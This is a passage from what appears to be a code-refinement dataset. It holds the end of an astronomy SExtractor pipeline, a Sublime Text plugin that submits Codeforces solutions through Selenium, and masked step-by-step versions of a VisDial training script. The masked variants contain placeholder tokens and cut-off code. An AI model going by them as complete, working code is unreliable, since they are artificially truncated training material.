temp_hdu_data = fits.PrimaryHDU((fits.getdata(i))*-1, header=fits.getheader(i))\n temp_hdu_mask = fits.ImageHDU(fits.getdata(i, 1))\n temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])\n temp_hdu_list.writeto(\"%s/residuals/temp.fits\" % (location))\n os.system(\"sextractor %s/residuals/temp.fits[0]> %s/temp/%s_2.txt -c %s\" % (location, sources, name, config_loc))\n append_negative_sources(i)\n os.remove(\"%s/residuals/temp.fits\" % (location))\n x += 1\n per = float(x)/float(len(images)) * 100\n print(\"\\t %.1f%% sextracted...\" % (per))\n print(\"-> SExtracted %d images, catalogues placed in 'sources' directory\\n\" % (len(images)))\n print(\"-> Filtering source catalogs...\\n\")\n src_join(location)\n filter_sources(location)\n \ndef sextractor_sim(image):\n location = image.split('/')[:-2]\n location = '/'.join(location)\n sources = location + \"/sources\"\n check = os.path.exists(sources)\n check_temp = os.path.exists(sources + '/temp')\n if check == False:\n os.system(\"mkdir %s\" % (sources))\n os.system(\"mkdir %s/temp\" % (sources))\n else:\n if check_temp == False:\n os.system(\"mkdir %s/temp\" % (sources))\n initialize.create_configs(location)\n config_loc = location + '/configs/default.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = \"PARAMETERS_NAME\" + \" \" + location + \"/configs/default.param\" + \"\\n\"\n data[20] = \"FILTER_NAME\" + \" \" + location 
+ \"/configs/default.conv\" + \"\\n\"\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print(\"\\n-> SExtracting fake image...\")\n name = image.split('/')[-1]\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[106] = \"PSF_NAME\" + \" \" + location + \"/psf/\" + name[:-5] + \".psf\" + \"\\n\"\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system(\"sextractor %s[0]> %s/temp/%s.txt -c %s\" % (image, sources, name, config_loc))\n temp_hdu_data = fits.PrimaryHDU((fits.getdata(image))*-1, header=fits.getheader(image))\n temp_hdu_mask = fits.ImageHDU(fits.getdata(image, 1))\n temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])\n temp_hdu_list.writeto(\"%s/residuals/temp.fits\")\n os.system(\"sextractor %s/residuals/temp.fits[0]> %s/temp/%s.txt -c %s\" % (location, sources, name, config_loc))\n os.remove(\"%s/residuals/temp.fits\" % (location))\n src_join(location)\n filter_sources(location)\n \ndef sextractor_psf(location):\n x = 0\n psf_loc = location + \"/psf\"\n data = location + \"/data\"\n templates = location + \"/templates\"\n check = os.path.exists(psf_loc)\n if check == False:\n os.system(\"mkdir %s\" % (psf_loc))\n temps = glob.glob(templates + \"/*.fits\")\n images = glob.glob(data + \"/*_A_.fits\")\n for t in temps:\n images.append(t)\n cats = glob.glob(location + '/psf/*.cat')\n images_names = [(i.split('/')[-1])[:-5] for i in images]\n cats_names = [(c.split('/')[-1])[:-4] for c in cats]\n imageCats = [im for im in images_names if im not in cats_names]\n images = []\n if temps == []:\n temps.append('')\n for imcats in imageCats:\n if imcats == (temps[0].split('/')[-1])[:-5]:\n images.append(temps[0])\n else:\n images.append(location+'/data/'+imcats+'.fits')\n initialize.create_configs(location)\n config_loc = location + '/configs/psf.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = \"PARAMETERS_NAME\" + \" \" + location + \"/configs/default.psfex\" + \"\\n\"\n data[19] = \"FILTER_NAME\" + \" \" + location + \"/configs/default.conv\" + \"\\n\"\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print(\"\\n-> Creating PSF catalogs...\")\n if len(temps) == 1:\n for i in images:\n name = i.split('/')[-1][:-5]\n hdu = fits.open(i)\n hdr = hdu[0].header\n pixscale = hdr['PIXSCALE']\n hdu.close()\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[6] = \"CATALOG_NAME\" + \" \" + psf_loc + \"/\" + name + \".cat\" + \"\\n\"\n data[44] = \"PIXEL_SCALE\" + \" \" + str(pixscale) + \"\\n\"\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system(\"sextractor %s[0] -c %s\" % (i, config_loc))\n x += 1\n per = float(x)/float(len(images)) * 100\n print(\"\\t %.1f%% sextracted...\" % (per))\n print(\"-> SExtracted %d images, catalogues placed in 'psf' directory\\n\" % (len(images)))\n else:\n print(\"\\n-> Error: Problem with number of template images\\n\")\n sys.exit()\n return images\n\ndef sextractor_psf_sim(location, image):\n psf_loc = location + \"/psf\"\n data = location + \"/data\"\n check = os.path.exists(psf_loc)\n length = len(data) + 1\n if check == False:\n os.system(\"mkdir %s\" % (psf_loc))\n initialize.create_configs(location)\n config_loc = location + '/configs/psf.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = \"PARAMETERS_NAME\" + \" \" + 
location + \"/configs/default.psfex\" + \"\\n\"\n data[20] = \"FILTER_NAME\" + \" \" + location + \"/configs/default.conv\" + \"\\n\"\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print(\"\\n-> Creating PSF catalog of fake image...\")\n name = image[length:-5]\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[6] = \"CATALOG_NAME\" + \" \" + psf_loc + \"/\" + name + \".cat\" + \"\\n\"\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system(\"sextractor %s[0] -c %s\" % (image, config_loc))\n \ndef weight_map(image):\n hdu = fits.open(image)\n hduMask = hdu[1].data\n zeroMask = np.zeros(hduMask.shape)\n weightMap = (np.logical_not(np.logical_or(hduMask,zeroMask))).astype(float)\n hdu.close()\n return weightMap\n\ndef src_join(location):\n source_loc = location + '/sources'\n temp_source_loc = source_loc + '/temp'\n temp_source_files = glob.glob(temp_source_loc + '/*.txt')\n image_names = filters.get_image_names(location)\n for file in temp_source_files:\n with open(file, 'r') as fl:\n data = fl.readlines()\n data = [str(file.replace('txt','fits')[len(source_loc)+6:]) + '\\n'] + data\n data.append(\"\\n\\n\\n\")\n with open(source_loc + '/sources.txt', 'a+') as s:\n if data[0] not in image_names:\n s.writelines(data)\n os.remove(file)\n try:\n os.rmdir(temp_source_loc)\n except:\n print(\"-> Error: Problem removing temp directory in '/sources'\")\n\ndef filter_sources(location, mask_sources=False):\n print(\"\\n-> Filtering out non PSF-like sources...\")\n filters.spread_model_filter(location)\n print(\"-> Filtering out diveted detections...\")\n images = glob.glob(location + '/data/*_A_.fits')\n for i in images:\n indices = filters.divot(i)\n filters.update_filtered_sources(location, indices)\n residuals = glob.glob(\"%s/residuals/*_residual_.fits\" % (location))\n if mask_sources == True:\n for r in residuals:\n filters.mask_sources_image(r)\n \ndef MR_filter_sources(location):\n with open(\"%s/sources/MR_sources.txt\" % (location), 'r') as MR_src:\n MR_lines = MR_src.readlines()\n MR_lines.insert(0, \"MR.fits\\n\")\n with open(\"%s/sources/MR_sources.txt\" % (location), 'w+') as MR_src:\n for line in MR_lines:\n MR_src.write(line)\n MR_loc = \"%s/residuals/MR.fits\" % (location)\n print(\"\\n-> Filtering out non PSF-like sources in master residual...\")\n filters.spread_model_filter(location, MR=True)\n print(\"-> Filtering out diveted detections in master residual...\")\n indices = filters.divot(MR_loc, MR=True)\n filters.update_filtered_sources(location, indices, MR=True)\n filters.write_total_sources(location)\n \ndef append_negative_sources(residual, MR=False):\n location = residual.split('/')[:-2]\n location = '/'.join(location)\n name = residual.split('/')[-1]\n name = name.replace('.fits', '')\n if MR == True:\n with open(\"%s/sources/%s_sources_2.txt\" % (location, name), 'r') as neg_sources:\n lines = neg_sources.readlines()\n with open(\"%s/sources/%s_sources.txt\" % (location, name), 'a') as sources:\n for l in lines:\n if l[0] != '#':\n sources.write(l)\n os.remove(\"%s/sources/%s_sources_2.txt\" % (location, name))\n else:\n with open(\"%s/sources/temp/%s_2.txt\" % (location, name), 'r') as neg_sources:\n lines = neg_sources.readlines()\n with open(\"%s/sources/temp/%s.txt\" % (location, name), 'a') as sources:\n for l in lines:\n if l[0] != '#':\n sources.write(l)\n os.remove(\"%s/sources/temp/%s_2.txt\" % (location, name))",
"step-ids": [
8,
9,
10,
11,
12
]
}
|
[
8,
9,
10,
11,
12
] |
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import sublime
import sublime_plugin
"""
Copy and paste the selenium and urllib3 Python modules into the
"sublime-text-3/Lib/Python3.3" folder of Sublime Text 3.
"""
def process(string):
# Get active file name
filename = sublime.active_window().active_view().file_name()
contestid, problem = string.strip().split()
# Change executor_url according to your preference
executor_url = "127.0.0.1:9222" # change 9222 to the port you have used.
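    # Chrome must already be running with remote debugging enabled on this port,
    # e.g. (assumed invocation -- adjust the binary name, port and profile dir):
    #   google-chrome --remote-debugging-port=9222 --user-data-dir=/tmp/cf-profile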
url = "codeforces.com/contest/" + contestid + "/problem/" + problem
_chrome_options = Options()
_chrome_options.add_argument('disable-infobars')
_chrome_options.add_argument("--start-maximized")
_chrome_options.add_experimental_option("debuggerAddress", executor_url)
try:
driver = webdriver.Chrome(options=_chrome_options)
driver.implicitly_wait(30)
try:
driver.get("http://" + url.rstrip())
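            # Looking up the file input doubles as a presence check for the submit
            # form; the implicit wait above gives the page time to load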
driver.find_element_by_name("sourceFile")
driver.find_element_by_css_selector('input[type="file"]').clear()
# Send File to Codeforces
driver.find_element_by_css_selector(
'input[type="file"]').send_keys(filename.rstrip())
# Click on submit button
driver.find_element_by_class_name("submit").click()
except Exception:
# In case Codeforces is too busy or File is untitled.
            sublime.error_message('Either Codeforces is too busy or the file is untitled.')
except Exception:
# In case Server is not active.
sublime.error_message('Server is not active.')
class SolveItCommand(sublime_plugin.TextCommand):
"""
    Submit the current solution to Codeforces from Sublime Text by getting the
    contest ID and problem ID from the user.
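    Example key binding (illustrative only, not part of the original plugin;
    Sublime derives the command name "solve_it" from this class name):
        { "keys": ["ctrl+alt+s"], "command": "solve_it" }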
"""
def run(self, _):
window = self.view.window()
# Input Panel to get Contest ID and Problem ID from the user
window.show_input_panel(
"Enter ContestID & ProblemID : ",
"",
self.on_done,
self.on_change,
self.on_cancel)
def on_done(self, input_data):
process(input_data)
def on_change(self, input_data):
pass
def on_cancel(self):
pass
|
normal
|
{
"blob_id": "9767014992981001bd2e8dece67525650c05a2a8",
"index": 4018,
"step-1": "<mask token>\n\n\nclass SolveItCommand(sublime_plugin.TextCommand):\n <mask token>\n\n def run(self, _):\n window = self.view.window()\n window.show_input_panel('Enter ContestID & ProblemID : ', '', self.\n on_done, self.on_change, self.on_cancel)\n\n def on_done(self, input_data):\n process(input_data)\n <mask token>\n\n def on_cancel(self):\n pass\n",
"step-2": "<mask token>\n\n\nclass SolveItCommand(sublime_plugin.TextCommand):\n \"\"\"\n Submit solution from sublime by getting contest ID and problem ID\n from the user\n \"\"\"\n\n def run(self, _):\n window = self.view.window()\n window.show_input_panel('Enter ContestID & ProblemID : ', '', self.\n on_done, self.on_change, self.on_cancel)\n\n def on_done(self, input_data):\n process(input_data)\n\n def on_change(self, input_data):\n pass\n\n def on_cancel(self):\n pass\n",
"step-3": "<mask token>\n\n\ndef process(string):\n filename = sublime.active_window().active_view().file_name()\n contestid, problem = string.strip().split()\n executor_url = '127.0.0.1:9222'\n url = 'codeforces.com/contest/' + contestid + '/problem/' + problem\n _chrome_options = Options()\n _chrome_options.add_argument('disable-infobars')\n _chrome_options.add_argument('--start-maximized')\n _chrome_options.add_experimental_option('debuggerAddress', executor_url)\n try:\n driver = webdriver.Chrome(options=_chrome_options)\n driver.implicitly_wait(30)\n try:\n driver.get('http://' + url.rstrip())\n driver.find_element_by_name('sourceFile')\n driver.find_element_by_css_selector('input[type=\"file\"]').clear()\n driver.find_element_by_css_selector('input[type=\"file\"]'\n ).send_keys(filename.rstrip())\n driver.find_element_by_class_name('submit').click()\n except Exception:\n sublime.error_message(\n 'Either Codeforces is too busy or File is Untitled.'\n )\n except Exception:\n sublime.error_message('Server is not active.')\n\n\nclass SolveItCommand(sublime_plugin.TextCommand):\n \"\"\"\n Submit solution from sublime by getting contest ID and problem ID\n from the user\n \"\"\"\n\n def run(self, _):\n window = self.view.window()\n window.show_input_panel('Enter ContestID & ProblemID : ', '', self.\n on_done, self.on_change, self.on_cancel)\n\n def on_done(self, input_data):\n process(input_data)\n\n def on_change(self, input_data):\n pass\n\n def on_cancel(self):\n pass\n",
"step-4": "from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport sublime\nimport sublime_plugin\n<mask token>\n\n\ndef process(string):\n filename = sublime.active_window().active_view().file_name()\n contestid, problem = string.strip().split()\n executor_url = '127.0.0.1:9222'\n url = 'codeforces.com/contest/' + contestid + '/problem/' + problem\n _chrome_options = Options()\n _chrome_options.add_argument('disable-infobars')\n _chrome_options.add_argument('--start-maximized')\n _chrome_options.add_experimental_option('debuggerAddress', executor_url)\n try:\n driver = webdriver.Chrome(options=_chrome_options)\n driver.implicitly_wait(30)\n try:\n driver.get('http://' + url.rstrip())\n driver.find_element_by_name('sourceFile')\n driver.find_element_by_css_selector('input[type=\"file\"]').clear()\n driver.find_element_by_css_selector('input[type=\"file\"]'\n ).send_keys(filename.rstrip())\n driver.find_element_by_class_name('submit').click()\n except Exception:\n sublime.error_message(\n 'Either Codeforces is too busy or File is Untitled.'\n )\n except Exception:\n sublime.error_message('Server is not active.')\n\n\nclass SolveItCommand(sublime_plugin.TextCommand):\n \"\"\"\n Submit solution from sublime by getting contest ID and problem ID\n from the user\n \"\"\"\n\n def run(self, _):\n window = self.view.window()\n window.show_input_panel('Enter ContestID & ProblemID : ', '', self.\n on_done, self.on_change, self.on_cancel)\n\n def on_done(self, input_data):\n process(input_data)\n\n def on_change(self, input_data):\n pass\n\n def on_cancel(self):\n pass\n",
"step-5": "from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\nimport sublime\nimport sublime_plugin\n\n\"\"\"\nCopy and Paste selinium module and urllib3 module of Python in\n\"sublime-text-3/Lib/Python3.3\" folder of sublime-text3\n\"\"\"\n\n\ndef process(string):\n\n # Get active file name\n filename = sublime.active_window().active_view().file_name()\n contestid, problem = string.strip().split()\n\n # Change executor_url according to your preference\n executor_url = \"127.0.0.1:9222\" # change 9222 to the port you have used.\n url = \"codeforces.com/contest/\" + contestid + \"/problem/\" + problem\n\n _chrome_options = Options()\n _chrome_options.add_argument('disable-infobars')\n _chrome_options.add_argument(\"--start-maximized\")\n _chrome_options.add_experimental_option(\"debuggerAddress\", executor_url)\n try:\n driver = webdriver.Chrome(options=_chrome_options)\n driver.implicitly_wait(30)\n\n try:\n driver.get(\"http://\" + url.rstrip())\n driver.find_element_by_name(\"sourceFile\")\n driver.find_element_by_css_selector('input[type=\"file\"]').clear()\n # Send File to Codeforces\n driver.find_element_by_css_selector(\n 'input[type=\"file\"]').send_keys(filename.rstrip())\n # Click on submit button\n driver.find_element_by_class_name(\"submit\").click()\n except Exception:\n # In case Codeforces is too busy or File is untitled.\n sublime.error_message('Either Codeforces is too busy or \\\n File is Untitled.')\n except Exception:\n # In case Server is not active.\n sublime.error_message('Server is not active.')\n\n\nclass SolveItCommand(sublime_plugin.TextCommand):\n \"\"\"\n Submit solution from sublime by getting contest ID and problem ID\n from the user\n \"\"\"\n def run(self, _):\n window = self.view.window()\n # Input Panel to get Contest ID and Problem ID from the user\n window.show_input_panel(\n \"Enter ContestID & ProblemID : \",\n \"\",\n self.on_done,\n self.on_change,\n self.on_cancel)\n\n def on_done(self, input_data):\n process(input_data)\n\n def on_change(self, input_data):\n pass\n\n def on_cancel(self):\n pass\n",
"step-ids": [
4,
6,
7,
8,
9
]
}
|
[
4,
6,
7,
8,
9
] |
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "0,1"
import logging
import itertools
import torch
from torch import nn, optim
from torch.optim import lr_scheduler
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter
from tqdm import tqdm
from setproctitle import setproctitle
from bisect import bisect
from datetime import datetime
import numpy as np
from data.dataset import VisDialDataset
from visdial.encoders import Encoder
from visdial.decoders import Decoder
from visdial.model import EncoderDecoderModel
from visdial.utils.checkpointing import CheckpointManager, load_checkpoint
from single_evaluation import Evaluation
class MVAN(object):
def __init__(self, hparams):
self.hparams = hparams
self._logger = logging.getLogger(__name__)
np.random.seed(hparams.random_seed[0])
torch.manual_seed(hparams.random_seed[0])
torch.cuda.manual_seed_all(hparams.random_seed[0])
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
self.device = (
torch.device("cuda", self.hparams.gpu_ids[0])
if self.hparams.gpu_ids[0] >= 0
else torch.device("cpu")
)
setproctitle(hparams.dataset_version + '_' + hparams.model_name + '_' + str(hparams.random_seed[0]))
# def _build_data_process(self):
def _build_dataloader(self):
# =============================================================================
# SETUP DATASET, DATALOADER
# =============================================================================
old_split = "train" if self.hparams.dataset_version == "0.9" else None
self.train_dataset = VisDialDataset(
self.hparams,
overfit=self.hparams.overfit,
split="train",
old_split = old_split
)
collate_fn = None
if "dan" in self.hparams.img_feature_type:
collate_fn = self.train_dataset.collate_fn
self.train_dataloader = DataLoader(
self.train_dataset,
batch_size=self.hparams.train_batch_size,
num_workers=self.hparams.cpu_workers,
shuffle=True,
drop_last=True,
collate_fn=collate_fn,
)
print("""
# -------------------------------------------------------------------------
# DATALOADER FINISHED
# -------------------------------------------------------------------------
""")
def _build_model(self):
# =============================================================================
# MODEL : Encoder, Decoder
# =============================================================================
print('\t* Building model...')
# Pass vocabulary to construct Embedding layer.
encoder = Encoder(self.hparams, self.train_dataset.vocabulary)
decoder = Decoder(self.hparams, self.train_dataset.vocabulary)
print("Encoder: {}".format(self.hparams.encoder))
print("Decoder: {}".format(self.hparams.decoder))
# New: Initializing word_embed using GloVe
if self.hparams.glove_npy != '':
encoder.word_embed.weight.data = torch.from_numpy(np.load(self.hparams.glove_npy))
print("Loaded glove vectors from {}".format(self.hparams.glove_npy))
# Share word embedding between encoder and decoder.
decoder.word_embed = encoder.word_embed
# Wrap encoder and decoder in a model.
self.model = EncoderDecoderModel(encoder, decoder)
self.model = self.model.to(self.device)
# Use Multi-GPUs
if -1 not in self.hparams.gpu_ids and len(self.hparams.gpu_ids) > 1:
self.model = nn.DataParallel(self.model, self.hparams.gpu_ids)
# =============================================================================
# CRITERION
# =============================================================================
if "disc" in self.hparams.decoder:
self.criterion = nn.CrossEntropyLoss()
elif "gen" in self.hparams.decoder:
self.criterion = nn.CrossEntropyLoss(ignore_index=self.train_dataset.vocabulary.PAD_INDEX)
# Total Iterations -> for learning rate scheduler
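    # NOTE: the "trainval" branch below assumes self.valid_dataset was also built,
    # which _build_dataloader() above does not currently do.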
if self.hparams.training_splits == "trainval":
self.iterations = (len(self.train_dataset) + len(self.valid_dataset)) // self.hparams.virtual_batch_size
else:
self.iterations = len(self.train_dataset) // self.hparams.virtual_batch_size
# =============================================================================
# OPTIMIZER, SCHEDULER
# =============================================================================
def lr_lambda_fun(current_iteration: int) -> float:
"""Returns a learning rate multiplier.
Till `warmup_epochs`, learning rate linearly increases to `initial_lr`,
and then gets multiplied by `lr_gamma` every time a milestone is crossed.
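      Worked example with illustrative values (warmup_epochs=1, warmup_factor=0.2,
      lr_milestones=[5, 7], lr_milestones2=[10, 12], lr_gamma=lr_gamma2=0.5):
        epoch 0.5 -> 0.2 * (1 - 0.5) + 0.5 = 0.6   (linear warmup)
        epoch 6   -> 0.5 ** 1 = 0.5                (one milestone crossed)
        epoch 11  -> 0.5 * 0.5 ** 1 = 0.25         (second decay schedule)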
"""
current_epoch = float(current_iteration) / self.iterations
if current_epoch <= self.hparams.warmup_epochs:
alpha = current_epoch / float(self.hparams.warmup_epochs)
return self.hparams.warmup_factor * (1.0 - alpha) + alpha
else:
return_val = 1.0
if current_epoch >= self.hparams.lr_milestones[0] and current_epoch < self.hparams.lr_milestones2[0]:
idx = bisect(self.hparams.lr_milestones, current_epoch)
return_val = pow(self.hparams.lr_gamma, idx)
elif current_epoch >= self.hparams.lr_milestones2[0]:
idx = bisect(self.hparams.lr_milestones2, current_epoch)
return_val = self.hparams.lr_gamma * pow(self.hparams.lr_gamma2, idx)
return return_val
if self.hparams.lr_scheduler == "LambdaLR":
self.optimizer = optim.Adam(self.model.parameters(), lr=self.hparams.initial_lr)
self.scheduler = lr_scheduler.LambdaLR(self.optimizer, lr_lambda=lr_lambda_fun)
else:
raise NotImplementedError
print(
"""
# -------------------------------------------------------------------------
# Model Build Finished
# -------------------------------------------------------------------------
"""
)
def _setup_training(self):
if self.hparams.save_dirpath == 'checkpoints/':
self.save_dirpath = os.path.join(self.hparams.root_dir, self.hparams.save_dirpath)
self.summary_writer = SummaryWriter(self.save_dirpath)
self.checkpoint_manager = CheckpointManager(
self.model, self.optimizer, self.save_dirpath, hparams=self.hparams
)
# If loading from checkpoint, adjust start epoch and load parameters.
if self.hparams.load_pthpath == "":
self.start_epoch = 1
else:
# "path/to/checkpoint_xx.pth" -> xx
self.start_epoch = int(self.hparams.load_pthpath.split("_")[-1][:-4])
self.start_epoch += 1
model_state_dict, optimizer_state_dict = load_checkpoint(self.hparams.load_pthpath)
if isinstance(self.model, nn.DataParallel):
self.model.module.load_state_dict(model_state_dict)
else:
self.model.load_state_dict(model_state_dict)
self.optimizer.load_state_dict(optimizer_state_dict)
self.previous_model_path = self.hparams.load_pthpath
print("Loaded model from {}".format(self.hparams.load_pthpath))
print(
"""
# -------------------------------------------------------------------------
# Setup Training Finished
# -------------------------------------------------------------------------
"""
)
def _loss_fn(self, epoch, batch, output):
target = (batch["ans_ind"] if "disc" in self.hparams.decoder else batch["ans_out"])
batch_loss = self.criterion(output.view(-1, output.size(-1)), target.view(-1).to(self.device))
return batch_loss
def train(self):
self._build_dataloader()
self._build_model()
self._setup_training()
# Evaluation Setup
evaluation = Evaluation(self.hparams, model=self.model, split="val")
# Forever increasing counter to keep track of iterations (for tensorboard log).
global_iteration_step = (self.start_epoch - 1) * self.iterations
running_loss = 0.0 # New
train_begin = datetime.utcnow() # New
print(
"""
# -------------------------------------------------------------------------
# Model Train Starts (NEW)
# -------------------------------------------------------------------------
"""
)
for epoch in range(self.start_epoch, self.hparams.num_epochs):
self.model.train()
# -------------------------------------------------------------------------
# ON EPOCH START (combine dataloaders if training on train + val)
# -------------------------------------------------------------------------
combined_dataloader = itertools.chain(self.train_dataloader)
print(f"\nTraining for epoch {epoch}:", "Total Iter:", self.iterations)
tqdm_batch_iterator = tqdm(combined_dataloader)
accumulate_batch = 0 # taesun New
for i, batch in enumerate(tqdm_batch_iterator):
buffer_batch = batch.copy()
for key in batch:
buffer_batch[key] = buffer_batch[key].to(self.device)
output = self.model(buffer_batch)
batch_loss = self._loss_fn(epoch, batch, output)
batch_loss.backward()
accumulate_batch += batch["img_ids"].shape[0]
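        # Gradient accumulation: only step the optimizer once a full virtual batch
        # has been accumulated, or on the last batch of the epoch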
if self.hparams.virtual_batch_size == accumulate_batch \
or i == (len(self.train_dataset) // self.hparams.train_batch_size): # last batch
self.optimizer.step()
# --------------------------------------------------------------------
# Update running loss and decay learning rates
# --------------------------------------------------------------------
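          # Exponential moving average of the batch loss (decay 0.95) for smoother logging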
if running_loss > 0.0:
running_loss = 0.95 * running_loss + 0.05 * batch_loss.item()
else:
running_loss = batch_loss.item()
self.optimizer.zero_grad()
accumulate_batch = 0
self.scheduler.step(global_iteration_step)
global_iteration_step += 1
# torch.cuda.empty_cache()
description = "[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]".format(
datetime.utcnow() - train_begin,
epoch,
global_iteration_step, running_loss,
self.optimizer.param_groups[0]['lr'])
tqdm_batch_iterator.set_description(description)
# tensorboard
if global_iteration_step % self.hparams.tensorboard_step == 0:
description = "[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]".format(
datetime.utcnow() - train_begin,
epoch,
global_iteration_step, running_loss,
self.optimizer.param_groups[0]['lr'],
)
self._logger.info(description)
# tensorboard writing scalar
self.summary_writer.add_scalar(
"train/loss", batch_loss, global_iteration_step
)
self.summary_writer.add_scalar(
"train/lr", self.optimizer.param_groups[0]["lr"], global_iteration_step
)
# -------------------------------------------------------------------------
# ON EPOCH END (checkpointing and validation)
# -------------------------------------------------------------------------
self.checkpoint_manager.step(epoch)
self.previous_model_path = os.path.join(self.checkpoint_manager.ckpt_dirpath, "checkpoint_%d.pth" % (epoch))
self._logger.info(self.previous_model_path)
if epoch < self.hparams.num_epochs - 1 and self.hparams.dataset_version == '0.9':
continue
torch.cuda.empty_cache()
evaluation.run_evaluate(self.previous_model_path, global_iteration_step, self.summary_writer,
os.path.join(self.checkpoint_manager.ckpt_dirpath, "ranks_%d_valid.json" % epoch))
torch.cuda.empty_cache()
return self.previous_model_path
|
normal
|
{
"blob_id": "4d1900c1a0a8d7639e0ec16fb0128fd8efc2e8a1",
"index": 9913,
"step-1": "<mask token>\n\n\nclass MVAN(object):\n <mask token>\n <mask token>\n <mask token>\n\n def _setup_training(self):\n if self.hparams.save_dirpath == 'checkpoints/':\n self.save_dirpath = os.path.join(self.hparams.root_dir, self.\n hparams.save_dirpath)\n self.summary_writer = SummaryWriter(self.save_dirpath)\n self.checkpoint_manager = CheckpointManager(self.model, self.\n optimizer, self.save_dirpath, hparams=self.hparams)\n if self.hparams.load_pthpath == '':\n self.start_epoch = 1\n else:\n self.start_epoch = int(self.hparams.load_pthpath.split('_')[-1]\n [:-4])\n self.start_epoch += 1\n model_state_dict, optimizer_state_dict = load_checkpoint(self.\n hparams.load_pthpath)\n if isinstance(self.model, nn.DataParallel):\n self.model.module.load_state_dict(model_state_dict)\n else:\n self.model.load_state_dict(model_state_dict)\n self.optimizer.load_state_dict(optimizer_state_dict)\n self.previous_model_path = self.hparams.load_pthpath\n print('Loaded model from {}'.format(self.hparams.load_pthpath))\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Setup Training Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _loss_fn(self, epoch, batch, output):\n target = batch['ans_ind'] if 'disc' in self.hparams.decoder else batch[\n 'ans_out']\n batch_loss = self.criterion(output.view(-1, output.size(-1)),\n target.view(-1).to(self.device))\n return batch_loss\n\n def train(self):\n self._build_dataloader()\n self._build_model()\n self._setup_training()\n evaluation = Evaluation(self.hparams, model=self.model, split='val')\n global_iteration_step = (self.start_epoch - 1) * self.iterations\n running_loss = 0.0\n train_begin = datetime.utcnow()\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Train Starts (NEW)\n # -------------------------------------------------------------------------\n \"\"\"\n )\n for epoch in range(self.start_epoch, self.hparams.num_epochs):\n self.model.train()\n combined_dataloader = itertools.chain(self.train_dataloader)\n print(f'\\nTraining for epoch {epoch}:', 'Total Iter:', self.\n iterations)\n tqdm_batch_iterator = tqdm(combined_dataloader)\n accumulate_batch = 0\n for i, batch in enumerate(tqdm_batch_iterator):\n buffer_batch = batch.copy()\n for key in batch:\n buffer_batch[key] = buffer_batch[key].to(self.device)\n output = self.model(buffer_batch)\n batch_loss = self._loss_fn(epoch, batch, output)\n batch_loss.backward()\n accumulate_batch += batch['img_ids'].shape[0]\n if (self.hparams.virtual_batch_size == accumulate_batch or \n i == len(self.train_dataset) // self.hparams.\n train_batch_size):\n self.optimizer.step()\n if running_loss > 0.0:\n running_loss = (0.95 * running_loss + 0.05 *\n batch_loss.item())\n else:\n running_loss = batch_loss.item()\n self.optimizer.zero_grad()\n accumulate_batch = 0\n self.scheduler.step(global_iteration_step)\n global_iteration_step += 1\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.optimizer\n .param_groups[0]['lr']))\n tqdm_batch_iterator.set_description(description)\n if (global_iteration_step % self.hparams.\n tensorboard_step == 0):\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.\n 
optimizer.param_groups[0]['lr']))\n self._logger.info(description)\n self.summary_writer.add_scalar('train/loss',\n batch_loss, global_iteration_step)\n self.summary_writer.add_scalar('train/lr', self.\n optimizer.param_groups[0]['lr'],\n global_iteration_step)\n self.checkpoint_manager.step(epoch)\n self.previous_model_path = os.path.join(self.checkpoint_manager\n .ckpt_dirpath, 'checkpoint_%d.pth' % epoch)\n self._logger.info(self.previous_model_path)\n if (epoch < self.hparams.num_epochs - 1 and self.hparams.\n dataset_version == '0.9'):\n continue\n torch.cuda.empty_cache()\n evaluation.run_evaluate(self.previous_model_path,\n global_iteration_step, self.summary_writer, os.path.join(\n self.checkpoint_manager.ckpt_dirpath, 'ranks_%d_valid.json' %\n epoch))\n torch.cuda.empty_cache()\n return self.previous_model_path\n",
